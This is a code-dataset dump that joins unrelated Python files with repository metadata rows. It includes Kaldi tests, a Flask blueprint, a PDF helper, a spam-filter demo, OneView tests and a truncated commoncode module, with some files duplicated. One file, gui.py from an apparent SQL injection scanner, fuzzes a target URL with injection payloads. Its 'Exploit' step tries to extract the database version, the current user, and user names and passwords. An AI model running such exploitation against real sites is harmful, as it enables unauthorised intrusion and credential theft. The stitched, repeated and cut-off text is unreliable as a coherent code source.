DEFAULT_PLOT_HEIGHT = 500
DEFAULT_PLOT_WIDTH = 800
def parse_args(args):
try:
height = int(args.get('height')[0])
except:
height = DEFAULT_PLOT_HEIGHT
try:
width = int(args.get('width')[0])
except:
width = DEFAULT_PLOT_WIDTH
try:
labeling_job_name = args.get('labeling_job_name')[0].decode('utf-8')
except:
print('A labeling job query parameter is required e.g, labeling_job_name=a-test-job-name')
exit(1)
try:
bucket = args.get('bucket')[0].decode('utf-8')
except:
print('A bucket query parameter is required e.g, bucket=an-s3-bucket-name')
exit(1)
try:
prefix = args.get('prefix')[0].decode('utf-8')
except:
print('A prefix parameter is required e.g, prefix=a/prefix/job-name/annotations/worker-response')
exit(1)
try:
user_pool_id = args.get('user_pool_id')[0].decode('utf-8')
except:
print('A user_pool_id parameter is required e.g, user_pool_id=us-west-2_adfsdasf')
exit(1)
return height, width, labeling_job_name, bucket, prefix, user_pool_id
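# Illustrative call site (a sketch; curdoc() and session_context are standard
# Bokeh server APIs, but this wiring is an assumption, not part of this module):
#
# from bokeh.io import curdoc
#
# args = curdoc().session_context.request.arguments
# height, width, labeling_job_name, bucket, prefix, user_pool_id = parse_args(args)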
| 2
| 0
| 0
| 0
| 0
| 1,062
| 0
| 0
| 23
|
ae7b9a5ad2f42b1085d8218767395ee08e327173
| 5,994
|
py
|
Python
|
gui.py
|
kratantjain/SQLiVS
|
6b91cc454742c753ef002ac52c01ddf09bdcf8ed
|
[
"MIT"
] | null | null | null |
gui.py
|
kratantjain/SQLiVS
|
6b91cc454742c753ef002ac52c01ddf09bdcf8ed
|
[
"MIT"
] | null | null | null |
gui.py
|
kratantjain/SQLiVS
|
6b91cc454742c753ef002ac52c01ddf09bdcf8ed
|
[
"MIT"
] | 1
|
2018-10-28T17:47:24.000Z
|
2018-10-28T17:47:24.000Z
|
Home()
| 41.625
| 127
| 0.656823
|
from Tkinter import *
from tkMessageBox import *
from tkFileDialog import *
from SQLinjector import *
import time
import websitedata
def checkvuln(wsite,name):
inject=[]
global result
for x in name:
sqlinject=x
inject.append(wsite.replace("FUZZ",sqlinject))
showinfo('Wait'," Checking website for vulnerability please wait")
result=injector(inject)
process()
def deepXploit():
global columns
global version
global curr_user
global steal_usr
global passwrd
columns=detect_columns(wsite)
version=detect_version(wsite)
curr_user=detect_user(wsite)
steal_usr,passwrd=steal_users(wsite)
def xploit():
pro.destroy()
xploy=Tk()
showinfo('Exploit', "Website is under deep exploitation, please wait..!")
xploy.geometry('1024x577')
xploy.configure(bg='white', cursor='circle')
pic=PhotoImage(file="softwall.gif")
xploy.title("SQL Injection Vulnerability Scanner")
Label(xploy,image=pic).grid(row=0,column=0,rowspan=20,columnspan=10)
Label(xploy,text='SQL Injection Vulnerability Scanner', font='Harrington 18 bold' ).grid(row=0,column=0,columnspan=10)
Label(xploy,text='Results:', font='Harrington 16 bold underline' ,bg='white').grid(row=2,column=0)
Label(xploy,text='No. of columns:-', font='Harrington 14 bold underline' ,bg='white').grid(row=6,column=0)
Label(xploy,text='Version:-', font='Harrington 14 bold underline' ,bg='white').grid(row=7,column=0)
Label(xploy,text='Current Database User:-', font='Harrington 14 bold underline' ,bg='white').grid(row=8,column=0)
## Label(xploy,text='Usernames & passwords:-', font='Harrington 14 bold underline' ,bg='white').grid(row=10,column=0)
for x in columns:
Label(xploy, text=x,font='Harrington 14 bold underline' ,bg='white').grid(row=6,column=(1+(int(columns.index(x)))))
## xploy.mainloop()
Label(xploy, text=version,font='Harrington 14 bold underline',bg='white').grid(row=7,column=1)
Label(xploy, text=curr_user,font='Harrington 14 bold underline' ,bg='white').grid(row=8,column=1)
## for x in steal_usr:
## Label(xploy,text=x,font='Harrington 14 bold underline' ,bg='white').grid(row=10,column=(1+(int(steal_usr.index(x)))))
## xploy.mainloop()
## for x in passwrd:
## Label(xploy,text=x,font='Harrington 14 bold underline' ,bg='white').grid(row=11,column=(1+(int(passwrd.index(x)))))
## xploy.mainloop()
xploy.mainloop()
def report():
p1.destroy()
global rep
rep=Tk()
rep.geometry('1024x577')
rep.configure(bg='white', cursor='circle')
pic=PhotoImage(file="softwall.gif")
rep.title("SQL Injection Vulnerability Scanner")
Label(rep,image=pic).grid(row=0,column=0,rowspan=10,columnspan=10)
Label(rep,text='SQL Injection Vulnerability Scanner', font='Harrington 18 bold' ).grid(row=0,column=0,columnspan=10)
Button(rep, text="back", bg='white', command=repback).grid(row=1, column=8)
Label(rep,text='Report:', font='Harrington 16 bold underline' ,bg='white').grid(row=2,column=0)
rep.mainloop()
def repback():
rep.destroy()
Home()
def process():
global pro
p1.destroy()
pro=Tk()
pro.geometry('1024x577')
pro.configure(bg='white', cursor='circle')
pic=PhotoImage(file="softwall.gif")
Label(pro,image=pic).grid(row=0,column=0,rowspan=20,columnspan=10)
pro.title("SQL Injection Vulnerability Scanner")
Label(pro,text='SQL Injection Vulnerability Scanner', font='Harrington 18 bold' ).grid(row=1,column=0,columnspan=10)
Label(pro,text='Processing:', font='Harrington 16 bold underline' ,bg='white').grid(row=2,column=0,sticky='W')
Label(pro,text='Testing errors:-', font='Harrington 14 bold ' ,bg='white').grid(row=3,column=0,sticky='W')
'''def testres(wsite,name):
inject=[]
for z in name:
y=(wsite.replace("FUZZ",z))
Label(pro,text='' , bg='white').grid(row=4,column=0,sticky='EWNS')
Label(pro,text=y, bg='white').grid(row=4,column=0,sticky='EW')
break'''
global i
i=int(0)
for x in result:
i=int(i+1)
Label(pro,text=x,font='Harrington 12 bold',bg='white').grid(row=5+i,column=0,sticky='NS')
if (len(result) != 0):
showinfo('Results','Website is vulnerable to sql injection')
Button(pro,text='Exploit',bg='white',command=lambda:[deepXploit(),xploit(),]).grid(row=10,column=5,sticky='W')
else :
showinfo('Results','Website is not vulnerable to sql injection')
pro.mainloop()
def checkres():
if not result:
showinfo('Results',"Not vulnerable")
def Home():
global p1
p1=Tk()
global s
p1.geometry('1024x577')
p1.configure(bg='white', cursor='circle')
pic=PhotoImage(file="softwall.gif")
Label(p1,image=pic).grid(row=0,column=0,rowspan=10,columnspan=10)
p1.title("SQL Injection Vulnerability Scanner")
Label(p1,text='SQL Injection Vulnerability Scanner', font='Harrington 18 bold' ).grid(row=0,column=0,columnspan=10)
Label(p1,text='Website:', font='Harrington 14 bold' ,bg='white').grid(row=2,column=0)
s=Entry(p1,bg='LightCyan4', cursor='dot')
s.grid(row=2,column=1,columnspan=5,sticky='EW')
Label(p1,text='Injection file select:', font='Harrington 14 bold' ,bg='white').grid(row=8,column=0)
def fileselect():
injectionfile=askopenfilename(title = "Select injection dictionary file",filetypes = (("text files","*.txt"),))
f = open(injectionfile, "r")
global name
name = f.read().splitlines()
print(name)
def webget():
global wsite
wsite=str(s.get()+"FUZZ")
print(wsite)
Button(p1, text='select file', command=fileselect, bg='white', cursor='dot').grid(row=8, column=1)
Button(p1, text="Check",bg='white',command=lambda:[webget(),checkvuln(wsite,name),]).grid(row=6,column=8, sticky='EWNS')
p1.mainloop()
Home()
| 0
| 0
| 0
| 0
| 0
| 5,646
| 0
| 1
| 331
|
1f013a9bb78006e16890563e1f2078779f4852ab
| 3,131
|
py
|
Python
|
src/pybind/matrix/kaldi_matrix_pybind_test.py
|
aadps/kaldi
|
cd351bb31c98f9d540c409478cbf2c5fef1853ca
|
[
"Apache-2.0"
] | null | null | null |
src/pybind/matrix/kaldi_matrix_pybind_test.py
|
aadps/kaldi
|
cd351bb31c98f9d540c409478cbf2c5fef1853ca
|
[
"Apache-2.0"
] | null | null | null |
src/pybind/matrix/kaldi_matrix_pybind_test.py
|
aadps/kaldi
|
cd351bb31c98f9d540c409478cbf2c5fef1853ca
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
# Copyright 2019 Mobvoi AI Lab, Beijing, China (author: Fangjun Kuang)
# Apache 2.0
import os
import sys
sys.path.insert(0, os.path.join(os.path.dirname(__file__), os.pardir))
import unittest
if __name__ == '__main__':
unittest.main()
| 29.537736
| 71
| 0.545513
|
#!/usr/bin/env python3
# Copyright 2019 Mobvoi AI Lab, Beijing, China (author: Fangjun Kuang)
# Apache 2.0
import os
import sys
sys.path.insert(0, os.path.join(os.path.dirname(__file__), os.pardir))
import unittest
import numpy as np
import kaldi
class TestFloatSubMatrix(unittest.TestCase):
def test_from_numpy(self):
num_rows = 5
num_cols = 6
data = np.arange(num_rows * num_cols).reshape(
num_rows, num_cols).astype(np.float32)
# =============================================================
# build a FloatSubMatrix() from a numpy array; memory is shared
# -------------------------------------------------------------
m = kaldi.FloatSubMatrix(data)
self.assertEqual(m.NumRows(), num_rows)
self.assertEqual(m.NumCols(), num_cols)
self.assertEqual(m.Stride(), data.strides[0] / 4)
for r in range(num_rows):
for c in range(num_cols):
self.assertEqual(m[r, c], data[r, c])
# memory is shared between numpy array and FloatSubMatrix
for r in range(num_rows):
for c in range(num_cols):
m[r, c] += 10
self.assertEqual(m[r, c], data[r, c])
# =============================================================
# Convert a FloatSubMatrix to a numpy array; memory is shared
# -------------------------------------------------------------
m_reference_count = sys.getrefcount(m)
d = m.numpy()
self.assertEqual(m_reference_count + 1, sys.getrefcount(m))
d += 10 # m is also changed because of memory sharing
for r in range(num_rows):
for c in range(num_cols):
self.assertEqual(d[r, c], m[r, c])
del d
self.assertEqual(m_reference_count, sys.getrefcount(m))
class TestFloatMatrix(unittest.TestCase):
def test_to_numpy(self):
# first, build a kaldi matrix
num_rows = 6
num_cols = 8
m = kaldi.FloatMatrix(row=num_rows, col=num_cols)
for r in range(num_rows):
for c in range(num_cols):
self.assertEqual(m[r, c], 0)
m_reference_count = sys.getrefcount(m)
# now to numpy; memory is shared
d = m.numpy()
self.assertEqual(m_reference_count + 1, sys.getrefcount(m))
d += 10
for r in range(num_rows):
for c in range(num_cols):
self.assertEqual(d[r, c], m[r, c])
del d
self.assertEqual(m_reference_count, sys.getrefcount(m))
class TestGeneralMatrix(unittest.TestCase):
def test_from_base_matrix(self):
num_rows = 5
num_cols = 6
m = kaldi.FloatMatrix(row=num_rows, col=num_cols)
mg = kaldi.GeneralMatrix(m)
mi = kaldi.FloatMatrix()
mg.GetMatrix(mi)
self.assertEqual(mi.NumRows(), num_rows)
self.assertEqual(mi.NumCols(), num_cols)
for r in range(num_rows):
for c in range(num_cols):
self.assertEqual(mi[r, c], 0)
if __name__ == '__main__':
unittest.main()
| 0
| 0
| 0
| 2,758
| 0
| 0
| 0
| -12
| 115
|
17e2ec4a244bb94a85b8daab658bef83ab4ca1af
| 1,982
|
py
|
Python
|
src/controllers/supporting_lists/controller.py
|
MaxVanHoucke/esp-uantwerp
|
6f2129d60954b198f233e75956a4f5c675a03cbc
|
[
"MIT"
] | null | null | null |
src/controllers/supporting_lists/controller.py
|
MaxVanHoucke/esp-uantwerp
|
6f2129d60954b198f233e75956a4f5c675a03cbc
|
[
"MIT"
] | null | null | null |
src/controllers/supporting_lists/controller.py
|
MaxVanHoucke/esp-uantwerp
|
6f2129d60954b198f233e75956a4f5c675a03cbc
|
[
"MIT"
] | null | null | null |
from flask import Blueprint
bp = Blueprint('manage_lists', __name__)
| 33.033333
| 89
| 0.701816
|
from flask import Blueprint, request, render_template, jsonify
from flask_login import current_user
from src.controllers.supporting_lists.manage_lists import manage, update_item
from src.models.type import TypeDataAccess
from src.models.tag import TagDataAccess
from src.models.research_group import *
from src.models.study_field import *
from src.models.employee import *
from src.models.db import get_db
bp = Blueprint('manage_lists', __name__)
@bp.route('/modify-lists', methods=["GET", "POST"])
def modify_lists():
"""
Handles the GET & POST request to '/modify-lists'.
GET: requests to render page
POST: request managing sent data
:return: Json with failure status / template rendering / function call to manage data
"""
if not current_user.is_authenticated or current_user.role == "student":
return jsonify({'success': False}), 400, {'ContentType': 'application/json'}
if request.method == "GET":
return render_template('supporting_lists.html')
else:
return manage(request.json)
@bp.route('/get-all-list-data', methods=['GET'])
def get_all_list_data():
"""
Handles the GET request to '/get-all-list-data'.
:return: Json with all list data
"""
conn = get_db()
all_types = TypeDataAccess(conn).get_types(False)
all_tags = TagDataAccess(conn).get_tags()
all_groups = ResearchGroupDataAccess(conn).get_research_groups(False)
all_employees = EmployeeDataAccess(conn).get_employees(False)
result = {
"types": [obj.to_dict() for obj in all_types],
"tags": all_tags,
"research groups": [obj.to_dict() for obj in all_groups],
"employees": [obj.to_dict() for obj in all_employees]
}
return jsonify(result)
@bp.route("/update-profile", methods=["POST"])
def update_profile():
"""
Handles the POST request to '/update-profile'.
:return: function call to update_item with sent data
"""
return update_item(request.json)
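# Wiring sketch (illustrative only; the Flask app object below is hypothetical
# and would normally be created in the application factory):
#
# from flask import Flask
#
# app = Flask(__name__)
# app.register_blueprint(bp)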
| 0
| 1,462
| 0
| 0
| 0
| 0
| 0
| 202
| 245
|
5e309a053528b67904d5d5112db0bd96f00b89b5
| 1,204
|
py
|
Python
|
makerbean/PDFBot.py
|
AndersonBY/python-makerbean
|
c7713a019217e7f2eb42010af8f4f6c8a15fa910
|
[
"MIT"
] | 8
|
2020-12-28T12:49:50.000Z
|
2021-04-12T13:49:19.000Z
|
makerbean/PDFBot.py
|
AndersonBY/python-makerbean
|
c7713a019217e7f2eb42010af8f4f6c8a15fa910
|
[
"MIT"
] | null | null | null |
makerbean/PDFBot.py
|
AndersonBY/python-makerbean
|
c7713a019217e7f2eb42010af8f4f6c8a15fa910
|
[
"MIT"
] | 4
|
2021-01-12T07:48:11.000Z
|
2021-04-12T13:49:21.000Z
|
# -*- coding: utf-8 -*-
# @Author: ander
# @Date: 2020-12-22 16:19:51
# @Last Modified by: ander
# @Last Modified time: 2020-12-22 16:25:49
| 30.1
| 85
| 0.649502
|
# -*- coding: utf-8 -*-
# @Author: ander
# @Date: 2020-12-22 16:19:51
# @Last Modified by: ander
# @Last Modified time: 2020-12-22 16:25:49
import pdfplumber
from PyPDF2 import PdfFileReader, PdfFileWriter, PdfFileMerger
import os.path
from .utilities import mkdir
class PDFBot(object):
"""docstring for ExcelBot"""
def __init__(self):
self.page_num = 0
def open(self, file_path):
self.filename, _ = os.path.splitext(os.path.basename(file_path))
self.pdf = pdfplumber.open(file_path)
self.pdf_reader = PdfFileReader(file_path)
self.page_num = self.pdf_reader.getNumPages()
def get_text(self, page):
pdf_page = self.pdf.pages[page]
return pdf_page.extract_text()
def split(self, page, folder):
mkdir(folder)
pdf_writer = PdfFileWriter()
pdf_writer.addPage(self.pdf_reader.getPage(page))
with open(os.path.join(folder, f"{self.filename}-p{page}.pdf"), "wb") as out:
pdf_writer.write(out)
def merge(self, pdfs, merged_name):
merger = PdfFileMerger()
for pdf in pdfs:
merger.append(PdfFileReader(pdf))
merger.write(f"{merged_name}.pdf")
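# Illustrative usage (file names are hypothetical):
#
# bot = PDFBot()
# bot.open('report.pdf')
# print(bot.get_text(0)) # extract the text of the first page
# bot.split(0, 'pages') # writes pages/report-p0.pdf
# bot.merge(['a.pdf', 'b.pdf'], 'combined') # writes combined.pdf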
| 0
| 0
| 0
| 911
| 0
| 0
| 0
| 37
| 111
|
7d8042e0a0e082248ae3fb8d16b1773619abf452
| 3,510
|
py
|
Python
|
tests/unit/resources/settings/test_backups.py
|
PragadeeswaranS/oneview-python
|
3acc113b8dd30029beb7c228c3bc2bbe67d3485b
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/resources/settings/test_backups.py
|
PragadeeswaranS/oneview-python
|
3acc113b8dd30029beb7c228c3bc2bbe67d3485b
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/resources/settings/test_backups.py
|
PragadeeswaranS/oneview-python
|
3acc113b8dd30029beb7c228c3bc2bbe67d3485b
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
###
# (C) Copyright [2019] Hewlett Packard Enterprise Development LP
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###
| 35.454545
| 118
| 0.74188
|
# -*- coding: utf-8 -*-
###
# (C) Copyright [2019] Hewlett Packard Enterprise Development LP
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###
from unittest import TestCase
import mock
from hpOneView.connection import connection
from hpOneView.resources.settings.backups import Backups
from hpOneView.resources.resource import ResourceClient
class BackupsTest(TestCase):
def setUp(self):
self.host = '127.0.0.1'
self.connection = connection(self.host)
self._client = Backups(self.connection)
@mock.patch.object(ResourceClient, 'get_collection')
def test_get_all_called_once(self, mock_get_collection):
self._client.get_all()
mock_get_collection.assert_called_once_with('/rest/backups')
@mock.patch.object(ResourceClient, 'get')
def test_get_called_once(self, mock_get):
self._client.get('appliance_backup_2017-04-20_180138')
mock_get.assert_called_once_with('appliance_backup_2017-04-20_180138')
@mock.patch.object(ResourceClient, 'get')
def test_get_with_uri_called_once(self, mock_get):
uri = '/rest/backups/appliance_backup_2017-04-20_180138'
self._client.get(uri)
mock_get.assert_called_once_with(uri)
@mock.patch.object(ResourceClient, 'create_with_zero_body')
def test_create_called_once(self, mock_create):
mock_create.return_value = {}
self._client.create()
mock_create.assert_called_once_with(timeout=-1)
@mock.patch.object(ResourceClient, 'download')
def test_download_called_once_by_id(self, mock_download):
download_uri = '/rest/backups/archive/appliance_backup_2017-04-20_182809'
destination = 'appliance_backup_2017-04-20_180138.bkp'
self._client.download(download_uri, destination)
mock_download.assert_called_once_with('/rest/backups/archive/appliance_backup_2017-04-20_182809', destination)
@mock.patch.object(ResourceClient, 'upload')
def test_upload_artifact_bundle_called_once(self, mock_upload):
filepath = "appliance_backup_2017-04-20_182809.bkp"
self._client.upload(filepath)
mock_upload.assert_called_once_with(filepath)
@mock.patch.object(ResourceClient, 'get')
def test_get_config_called_once(self, mock_get):
self._client.get_config()
mock_get.assert_called_once_with('config')
@mock.patch.object(ResourceClient, 'update')
def test_update_config_called_once(self, mock_update):
options = {"enabled": False}
self._client.update_config(options, timeout=30)
mock_update.assert_called_once_with(options, uri='/rest/backups/config', timeout=30)
@mock.patch.object(ResourceClient, 'update_with_zero_body')
def test_update_remote_archive_called_once(self, mock_update):
save_uri = '/rest/backups/remotearchive/appliance_backup_2017-04-20_182809'
self._client.update_remote_archive(save_uri, timeout=30)
mock_update.update_with_zero_body(uri=save_uri, timeout=30)
| 0
| 2,244
| 0
| 399
| 0
| 0
| 0
| 89
| 136
|
4bc85f8092188613ab654a4c3765404fe3fb867c
| 672
|
py
|
Python
|
airbnb/system/region_revenue.py
|
mpresh/airbnb-tools
|
6f1884082e91ec810ea5667a1b2041ad246ebf7b
|
[
"MIT"
] | 1
|
2017-07-12T16:44:02.000Z
|
2017-07-12T16:44:02.000Z
|
airbnb/system/region_revenue.py
|
mpresh/airbnb-tools
|
6f1884082e91ec810ea5667a1b2041ad246ebf7b
|
[
"MIT"
] | null | null | null |
airbnb/system/region_revenue.py
|
mpresh/airbnb-tools
|
6f1884082e91ec810ea5667a1b2041ad246ebf7b
|
[
"MIT"
] | null | null | null |
import zipcodes
if __name__ == "__main__":
region_average_revenue(zipcodes.get_all_cape_cod_zip_codes)
| 33.6
| 80
| 0.733631
|
import zipcodes
import listings
import bnbcalendar
import finance
from pprint import pprint
def region_average_revenue(zipcodes_func, adults=16, state="MA"):
rooms = listings.get_all_listings(zipcodes_func, adults=adults, state=state)
#rooms = ["4914702", "16042826"]
for room in rooms:
print("Getting calendar for {}".format(room))
calendar = bnbcalendar.get_calendar_for_next_year(room, adults=adults-3)
total_revenue = finance.calculate_total_revenue(calendar)
print("listing {} revenue {}".format(room, total_revenue))
if __name__ == "__main__":
region_average_revenue(zipcodes.get_all_cape_cod_zip_codes)
| 0
| 0
| 0
| 0
| 0
| 455
| 0
| -12
| 111
|
2b4944225389f356c9da74143b2cea6864e7e5f4
| 2,458
|
py
|
Python
|
conveniences/demo_mnbc.py
|
mateusnbm/ai-conveniences
|
4a0cd0d761f1d534149f9f0ab03f5f94e4290580
|
[
"MIT"
] | null | null | null |
conveniences/demo_mnbc.py
|
mateusnbm/ai-conveniences
|
4a0cd0d761f1d534149f9f0ab03f5f94e4290580
|
[
"MIT"
] | null | null | null |
conveniences/demo_mnbc.py
|
mateusnbm/ai-conveniences
|
4a0cd0d761f1d534149f9f0ab03f5f94e4290580
|
[
"MIT"
] | null | null | null |
#
# demo_spam_classifier.py
#
# Multinomial Naive Bayes Classifier.
#
# Based-on:
#
# https://www.udemy.com/data-science-and-machine-learning-with-python-hands-on/
# http://blog.datumbox.com/machine-learning-tutorial-the-naive-bayes-text-classifier/
#
from pandas import DataFrame
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.naive_bayes import MultinomialNB
'''
Convenience functions to read the emails and store their messages and
classes in a pandas dataframe.
'''
'''
Read the data and store it in a pandas dataframe.
'''
data = DataFrame({'message': [], 'class': []})
data = data.append(dataFrameFromDirectory('../datasets/emails/ham', 'ham'))
data = data.append(dataFrameFromDirectory('../datasets/emails/spam', 'spam'))
'''
We pass an array of messages to vectorizer.fit_transform(), which converts
each word to a global token and counts its occurrences across all emails.
'''
vectorizer = CountVectorizer()
counts = vectorizer.fit_transform(data['message'].values)
'''
Now we train a Multinomial Naive Bayes Classifier using the frequencies
obtained in the last step. We'll use this variant of the algorithm because
our premise is that spam messages tend to contain certain words that easily
give away their nefarious purpose.
'''
classifier = MultinomialNB()
targets = data['class'].values
classifier.fit(counts, targets)
'''
Run some examples to test the classifier.
'''
examples = ['Free Viagra now!!!', "Hi Bob, how about a game of golf tomorrow?", "Luke... I'm your father."]
example_counts = vectorizer.transform(examples)
predictions = classifier.predict(example_counts)
print(predictions)
| 27.931818
| 107
| 0.684703
|
#
# demo_spam_classifier.py
#
# Multinomial Naive Bayes Classifier.
#
# Based-on:
#
# https://www.udemy.com/data-science-and-machine-learning-with-python-hands-on/
# http://blog.datumbox.com/machine-learning-tutorial-the-naive-bayes-text-classifier/
#
import os
import io
import numpy
from pandas import DataFrame
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.naive_bayes import MultinomialNB
'''
Convenience functions to read the emails and store their messages and
classes in a pandas dataframe.
'''
def readFiles(path):
for root, dirnames, filenames in os.walk(path):
for filename in filenames:
path = os.path.join(root, filename)
inBody = False
lines = []
f = io.open(path, 'r', encoding='latin1')
for line in f:
if inBody:
lines.append(line)
elif line == '\n':
inBody = True
f.close()
message = '\n'.join(lines)
yield path, message
def dataFrameFromDirectory(path, classification):
rows = []
index = []
for filename, message in readFiles(path):
rows.append({'message': message, 'class': classification})
index.append(filename)
return DataFrame(rows, index=index)
'''
Read the data and store it in a pandas dataframe.
'''
data = DataFrame({'message': [], 'class': []})
data = data.append(dataFrameFromDirectory('../datasets/emails/ham', 'ham'))
data = data.append(dataFrameFromDirectory('../datasets/emails/spam', 'spam'))
'''
We pass an array of messages to vectorizer.fit_transform(), which converts
each word to a global token and counts its occurrences across all emails.
'''
vectorizer = CountVectorizer()
counts = vectorizer.fit_transform(data['message'].values)
'''
Now we train a Multinomial Naive Bayes Classifier using the frequencies
obtained in the last step. We'll use this variant of the algorithm because
our premise is that spam messages tend to contain certain words that easily
give away their nefarious purpose.
'''
classifier = MultinomialNB()
targets = data['class'].values
classifier.fit(counts, targets)
'''
Run some examples to test the classifier.
'''
examples = ['Free Viagra now!!!', "Hi Bob, how about a game of golf tomorrow?", "Luke... I'm your father."]
example_counts = vectorizer.transform(examples)
predictions = classifier.predict(example_counts)
print(predictions)
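# Optional sanity check (a sketch, not part of the original demo): hold out a
# test split and report accuracy on unseen messages.
from sklearn.model_selection import train_test_split

train_counts, test_counts, train_targets, test_targets = train_test_split(
    counts, targets, test_size=0.2, random_state=42)
held_out = MultinomialNB()
held_out.fit(train_counts, train_targets)
print('held-out accuracy:', held_out.score(test_counts, test_targets))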
| 0
| 0
| 0
| 0
| 494
| 241
| 0
| -33
| 113
|
e5ab48881e462aa904536ebf91d486c500e7719a
| 115
|
py
|
Python
|
testing_focus_session/01_unit_tests/03_pytest/02_fixtures/05_request_fixture/test_module.py
|
netanelrevah/testing-focus-session
|
ce1ef76afa444ee50a1d20f0855ae5073ee2c2d9
|
[
"MIT"
] | 1
|
2020-06-26T12:40:38.000Z
|
2020-06-26T12:40:38.000Z
|
testing_focus_session/01_unit_tests/03_pytest/02_fixtures/05_request_fixture/test_module.py
|
netanelrevah/testing-focus-session
|
ce1ef76afa444ee50a1d20f0855ae5073ee2c2d9
|
[
"MIT"
] | null | null | null |
testing_focus_session/01_unit_tests/03_pytest/02_fixtures/05_request_fixture/test_module.py
|
netanelrevah/testing-focus-session
|
ce1ef76afa444ee50a1d20f0855ae5073ee2c2d9
|
[
"MIT"
] | 1
|
2021-10-05T10:29:19.000Z
|
2021-10-05T10:29:19.000Z
|
ports = [80, 433, 8080, 8000]
| 16.428571
| 34
| 0.652174
|
ports = [80, 433, 8080, 8000]
def test_connections(connections):
for c in connections:
print(c.port)
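# A conftest.py that could provide the 'connections' fixture used above
# (sketch; the Connection class is hypothetical, while request.module is the
# standard pytest way to reach module-level names such as 'ports'):
#
# import pytest
#
# class Connection:
#     def __init__(self, port):
#         self.port = port
#
# @pytest.fixture
# def connections(request):
#     return [Connection(port) for port in request.module.ports]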
| 0
| 0
| 0
| 0
| 0
| 61
| 0
| 0
| 23
|
3f2201b86a9fcb9ecd7c3f12b0c04d9a9eeca535
| 6,660
|
py
|
Python
|
src/commoncode/filetype.py
|
Pratikrocks/commoncode
|
02fb544869708607997bbf3440e1b402c68a3164
|
[
"Apache-2.0"
] | 2
|
2020-09-28T10:12:28.000Z
|
2021-01-15T11:16:44.000Z
|
src/commoncode/filetype.py
|
Pratikrocks/commoncode
|
02fb544869708607997bbf3440e1b402c68a3164
|
[
"Apache-2.0"
] | 28
|
2020-11-13T01:39:37.000Z
|
2022-03-28T20:14:50.000Z
|
src/commoncode/filetype.py
|
Pratikrocks/commoncode
|
02fb544869708607997bbf3440e1b402c68a3164
|
[
"Apache-2.0"
] | 6
|
2020-11-18T00:16:18.000Z
|
2021-09-01T09:01:11.000Z
|
#
# Copyright (c) nexB Inc. and others. All rights reserved.
# SPDX-License-Identifier: Apache-2.0
# See http://www.apache.org/licenses/LICENSE-2.0 for the license text.
# See https://github.com/nexB/commoncode for support or download.
# See https://aboutcode.org for more information about nexB OSS projects.
#
import os
from datetime import datetime
from commoncode.system import on_posix
"""
Low level file type utilities, essentially a wrapper around os.path and stat.
"""
def is_link(location):
"""
Return True if `location` is a symbolic link.
"""
return location and os.path.islink(location)
def is_file(location, follow_symlinks=False):
"""
Return True if `location` is a file.
"""
_is_file = location and os.path.isfile(location)
if follow_symlinks:
return _is_file
return _is_file and not is_link(location) and not is_broken_link(location)
def is_dir(location, follow_symlinks=False):
"""
Return True if `location` is a directory.
"""
_is_dir = location and os.path.isdir(location) and not is_file(location)
if follow_symlinks:
return _is_dir
return _is_dir and not is_link(location) and not is_broken_link(location)
def is_regular(location):
"""
Return True if `location` is regular. A regular location is a file or a
dir and not a special file or symlink.
"""
return location and (is_file(location) or is_dir(location))
def is_special(location):
"""
    Return True if `location` is a special file. A special file is not a
regular file, i.e. anything such as a broken link, block file, fifo,
socket, character device or else.
"""
return not is_regular(location)
def is_broken_link(location):
"""
Return True if `location` is a broken link.
"""
# always false on windows, until Python supports junctions/links
if on_posix and is_link(location):
target = get_link_target(location)
target_loc = os.path.join(os.path.dirname(location), target)
return target and not os.path.exists(target_loc)
def get_link_target(location):
"""
    Return the link target for `location` if it is a link, or an empty
    string otherwise.
"""
target = ''
# always false on windows, until Python supports junctions/links
if on_posix and is_link(location):
try:
# return false on OSes not supporting links
target = os.readlink(location)
except UnicodeEncodeError:
# location is unicode but readlink can fail in some cases
pass
return target
# Map of type checker function -> short type code
# The order of type checks matters: link -> file -> directory -> special
TYPES = dict([
(is_link, ('l', 'link',)),
(is_file, ('f', 'file',)),
(is_dir, ('d', 'directory',)),
(is_special, ('s', 'special',))
])
def get_type(location, short=True):
"""
Return the type of the `location` or None if it does not exist.
Return the short form (single character) or long form if short=False
"""
if location:
for type_checker in TYPES:
tc = type_checker(location)
if tc:
short_form, long_form = TYPES[type_checker]
return short and short_form or long_form
def is_readable(location):
"""
Return True if the file at location has readable permission set.
Does not follow links.
"""
if location:
if is_dir(location):
return os.access(location, os.R_OK | os.X_OK)
else:
return os.access(location, os.R_OK)
def is_writable(location):
"""
Return True if the file at location has writeable permission set.
Does not follow links.
"""
if location:
if is_dir(location):
return os.access(location, os.R_OK | os.W_OK | os.X_OK)
else:
return os.access(location, os.R_OK | os.W_OK)
def is_executable(location):
"""
Return True if the file at location has executable permission set.
Does not follow links.
"""
if location:
if is_dir(location):
return os.access(location, os.R_OK | os.W_OK | os.X_OK)
else:
return os.access(location, os.X_OK)
def is_rwx(location):
"""
Return True if the file at location has read, write and executable
permission set. Does not follow links.
"""
return is_readable(location) and is_writable(location) and is_executable(location)
def get_last_modified_date(location):
"""
    Return the last modified date stamp of a file in YYYY-MM-DD format. The date
of non-files (dir, links, special) is always an empty string.
"""
yyyymmdd = ''
if is_file(location):
utc_date = datetime.isoformat(
datetime.utcfromtimestamp(os.path.getmtime(location))
)
yyyymmdd = utc_date[:10]
return yyyymmdd
counting_functions = {
'file_count': lambda _: 1,
'file_size': os.path.getsize,
}
def get_file_count(location):
"""
